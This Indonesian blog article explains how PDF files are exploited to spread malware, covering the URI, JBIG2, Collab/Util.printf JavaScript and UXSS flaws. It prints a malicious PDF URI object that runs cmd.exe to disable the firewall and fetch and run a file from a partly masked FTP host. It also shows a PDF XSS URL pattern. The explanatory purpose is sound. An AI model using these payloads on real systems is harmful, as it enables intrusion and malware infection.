Tips Mengatasi File PDF Agar Tidak Mudah Disusupi Virus
Tips Mengatasi File PDF Agar Tidak Mudah Disusupi Virus - Saat ini dokumen berbentuk
file PDF semakin banyak digunakan. Alasan penggunaan format ini, adalah dokumen
tidak bisa diubah-ubah. Tetapi celakanya oleh para pembuat malware, justru ini
yang menjadi sasaran empuk untuk melakukan serangan. Para pembuat malware
melakukan eksipoit pada sejumlah kelemahan yang ada pada PDF Adobe, sehingga format
tersebut tak bisa digunakan.
Lebih dari 70% serangan dilakukan melalui Trojan
terhadap file PDF. Mayoritas penyerang berkembang dari metodologi serangan
tradisional seperti email, ke serangan terhadap PDF, yang dianggap sebagai cara
paling sederhana untuk menyebarkan malware ke seantero Internet.
PDF sering dijadikan target malware sejak melakukan
plug-in support di web browser. Ketika pengguna mengunjungi sebuah web berbahaya,
dokumen PDF dilayani dengan HTTP, dan selama malware masuk ke mesin pengguna
tanpa disadari.
Belakangan ini ada banyak PDF berbahaya yang tersimpan
di situs internet dan siap untuk menyerang pengguna. Seperti kita tahu, PDF
adalah salah satu format file paling popular dan dipakai sebagai format dokumen
standar di Amerika dan banyak negara lain, untuk mendistribusikan dokumen
seperti laporan pajak dan dokumen resmi lain.
PDF juga banyak dipakai untuk format ebook. Ya, format
ini sudah lama dipakai, namun serangan malware yang menyusup ke dalamnya baru
mulai marak akhir-akhir ini.
Pertanyaanya adalah, mengapa PDF yang dijadikan media
penyebar malware? Brikut adalah alasannya:
PDF dipakai secara luas (Laporan pajak, Slip pembayaran, ebook, dan sebagainya)PDF mampu menjalankan konten aktiv seperti JavaScriptPDF mampu membuat request HTTPPDF mampu menjalankan format rich media (.swf,.avi, .mpeg,. asf,.wmv, .wmx, dan .spl).
Berdasar semua fitur itu, maka dapat dikatakan bahwa
PDF tergolong sebagai konten yang aktif. Format lain PDF juga mampu menjadi
sasaran, misalnya Flash (SWF), dapat menjadi lemah ketika dikombinasikan dengan
PDF. Beberapa
waktu terakhir diketahui bahwa tingkat kelemahan PDF semakin meninggi. Di bawah
ini adalah grafik yang menunjukkan peningkatan kelemahan Adobe PDF yang cukup
menjadi perhatian para penyerang dan peneliti antivirus. Serangan terhadap PDF
meningkat seiring dengan berkurangnya solusi antivirus yang mampu mendeteksi
tren serangan baru.
Industri
antivirus perlu melakukan terobosan dalam menghadapi ancaman serangan terhadap
PDF. Kami telah menerima banyak laporan mengenai file PDF berbahaya beserta
infeksinya, mulai dari pelanggan dari skala rumahan hingga enterprise. Serangan
PDF ini makin mudah terdistribusi ke seantero dunia maya melalui email dan
HTTP.
Walau
sejumlah perusahaan sudah menjalankan sistem keamanan dan memindai trafik demi
memerangi ancaman itu, mereka hanya dapat memproteksi diri dari ancaman yang
sudah dikenali, bukan jenis proteksi proaktif. Isu ini cukup serius saat ini,
dan industri antivirus perlu menyiasatinya sebelum semakin parah.
Ragam Teknik Serangan
Kita akan membahas sejumlah kelemahan PDF dan
teknik-teknik serangan yang digunakan untuk luput dari deteksi solusi
antivirus. Berikut adalah daftar vulnerabilitas yang menjadi topik bahasan
komunitas antivirus :
Vulnerabilitas PDF URIVulnerabilitas PDF J2BIGVulnerabilitas yang berkaitan dengan fungsi PDF JavaScript :Metode Collab.collectEmaillnfoMetode Collab.getlconMetode Utill.printfUXSS dalam PDF
Vulnerabilitas URI
Kelemahan ini berhubungan dengan Adobe PDF’s mailto
URI, dimana URIdipakai sebagai akses ke sistem file lokal pada komputer
pengguna untuk melancarkan serangan. Pada kasus ini, penyerang dapat
menciptakan rekues spesial URI. Sebagai contoh, rekues dibawah ini mampu
mengakses lapisan perintah lokal Windows dan akan mengeksekusi sejumlah
perintah.
<<URI(mailto:support@<site>.com%../../../../../../../../../windows/system32/cmd”.exe””
Perintah ini memungkinkan penyerang menciptakan dokumen
PDF khusus yang mengandung URI buatan demi mengakses sumber-sumber lokal dan
mengeksekusi beberapa perintah dasar melalui sistem akses file, dan mengunduh
malware melalui internet sehingga menginfeksi komputer pengguna. Dibawah ini adalah contoh dimana file PDF berbahaya telah
dibuat sedemikian rupa sehingga mengunduh malware dari internet dengan
menggunakan shell perintah lokal untuk mengeksekusi perintah ftp.
<</Metadata90R/Pages50R/Type/Catalog>>
endobj
70obj
<<URI(mailto:support@<site>.com%../../../../../../../../../windows/system32/cmd”.exe””/c”set&cls&netsh
firewall set opmode mode=disable&echo 0 81.95.xxx.181>i&echo
Binary>>i&echo
get / system.com>>i&echo
Quit>>i&ftp-s:i-v-Anul&del/q
i&start
System.com&**(1),cm\
d)/S/URI>>
endobj
File PDF yang sudah mengakali URI untuk mengeksploit
kelemahannya akan mengakses cmd.exe dan mengeksekusi sebuah rantai perintah
windows untuk melakukan aksi berikut :
1. Menghilangkan firewall
windows
2. Menciptakan file temporer “i”
dengan ftp commands;
3. File”i” tersebut mengandung
informasi untuk men-download file berbahaya, “system.com”;
4. Menggunakan ftp.exe dan ftp
command file “i” to untuk men-download malware
5. Mengeksekusi malware yang
sudah ter-down-load.
Para penyerang menyebarkan file
tersebut dalam bentuk spam, dengan menggunakan teknik social engineering untuk
memikat pengguna membuka file dengan menyamar menjadi pengirim tiket pesawat
atau sejenisnya.
Vulnerabilitas JBIG2
JBIG2 adalah format kompresi gambar yang dapat dipakai
sebagai sistem embedded dalam mendisplai gambar. Ketika sebuah dokumen PDF
terdisplai maka sistem itu akan terurai menjadi gambar. Vulnerabilitas ini
dapat dapat dieksploi melalui PDF khusus berisi stream JBIG2 dengan header yang
sudah dikorup. Ketika stream ini diinterprestasikan oleh Acrobat reader maka
akan menghasilkan arus buffer atau panahan.
Arus buffer ini dapat digunakanuntuk mengeksekusi kode
arbitrasi salam konteks pengguna terkini melakukan logged-in. Para pembuat
malware telah mengeksplotasi kelemahan ini untuk menyebarkan infeksi malware
enggan menggunakan file PDF yang mengandung stream JBIG2 yang sudah
termodifikasi. Hal ini akan menyebabkan crash pada Adobe Acrobat Reader.
Fungsi PDF JavaScript
Di bagian ini kami membahas beberapa vulnerabilitas
terkini yang menggunakan obyek JavaScript dalam PDF. Sejumlah fungsi dalam
JavaScript lemah dan tidak aman, mereka dapat dieksploitasi menggunakan
JavaScript yang diakali bersama dengan PDF. Berikut beberapa contohnya:
*collabs.CollectEmaillnfo
Metode CollectEmaillnfo in Object Collab ini memiliki
kelemahan yang menghasilkan arus penahan, sebab ia tidak melakukan validasi
parameter ukuran sebelum proses dilakukan. Aturu buffer tersebut digunakan
untuk mengeksplotasi PDF reader ketika PDF berisikan JavaScript mengeksekusi
kode arbitasi.
Pada banyak kasus, JavaScript dikompresi dengan Zlib
dan tidak terkompres pada load PDF. Sepertinya hampir semua kompresi digunakan
untuk menyembunyikan JavaScript dari analis. Ada juga kasus dimana PDF
mengandung JavaScript Stream yang dikompresi dengan alogaritma Zlib Extreme.
Netralisasi kompresi stream ini menggunakan tool seperti pdfextract, PDFtk,
atau inflate yang selayaknya menghasilkan teks JavaScript. Bagaimanapun juga,
kasus ini menghasilkan Obfuscated JavaScript yang mengandung fungsi dekoding.
Metode ini akan mengeksekusi kode terurai dari JavaScript. Kita dapat
menggunakan malzilla untuk mengeksekusinya.
*Vulnerabilitas
Collab.getIcon
Metode ini mengandung kelemahan arus buffer yang
menjadi keunggulan penyerang dalam menyebarkan malware, dimana ada banyak file
PDF berbahaya tersimpan di situs-situs dan terdistribusi melalui email.
Eksploitasi metode ini sama dengan metode collectEmaillnfo.
Metode Util.printf
Metode penyebar malware ini menggunakan prinsip print
dalam JavaScript dengan arus buffer yang memungkinkan file PDF berbahaya mengeksekusi
kode shell untuk berkompromi dengan komputer pengguna.
UXSS (Universal Cross Site Scripting) dalam PDF
Vulnerabilitas ini berhubungan dengan bagaimana PDF
yang ber-host di web dapat digunakan untuk menjalankan serangan XSS. Disini
penyerang mengirim email dengan menggunakan teknik social engineering untuk
mengakali konten pesan dan menyembunyikan link tersembunyi ke file PDF yang ada
di server bersih. Ketika pengguna mengeklik link itu, penyerang melampirkan
script yang sudah dieksekusi dalam meligitimasi sesi web : Kelemahan ini
tergantung pada keyakinan si pengguna, dimana malware dapat dieksekusi
sepanjang pengguna percaya bahwa mereka mengklik link yang benar.
Dibawah ini adalah contoh XSS sederhana dari PDFyang
mengeksploitasi vulnerabilitas ini :
http://<somewebsite>.com/file.pdf#anything:javascript=malicous
script
contoh:
http://<somewebsite>.com/file.pdf#anything:javascript=alert(‘Hai
XSS’);
Bahasa programming berbeda yang mendukung PDFdapat
diciptakan melalui API. Secara instan, dalam PHP atau Python dapat ditulis
script sederhana untuk menghasilkan dokumen PDF dan script ini dapat ditaruh di
server web yang mendukung.
Teknologi APIdapat menciptakan dan memodifikasi
file-file PDF. Inilah yang kemudian disalahgunakan oleh penyerang yang menaruh
script lawan ke web untuk menjalankan file PDF berbahaya ke seantero HTTP.
Script ini dapat menangani file PDF yang berbeda seiap waktu dan tergantung
pada permintaan, mereka dapat menggunakan obfuskasi berbeda untuk menempel pada
script.
Hal ini membuat deteksi pada PDF menjadi sulit, sebab
konten file internet berubah setiap waktu sebuah file PDF baru diminta oleh
server. Script-script ini sudah siap untuk melakukan script kiddies pada siapa
saja yang memerlukan dukungan server dan ruangan pada web. Dari cara inilah
serangan PDF dapat menyebar cepat, dan teknik obfuskasi ini dengan mudah
mengelak dari deteksi solusi antivirus.
Demikian Tips Mengatasi File PDF Agar Tidak Mudah Disusupi Virus, semoga
bermanfaat bagi Anda, baca juga artikel lainnya mengenai Tips dan TrikKomputer.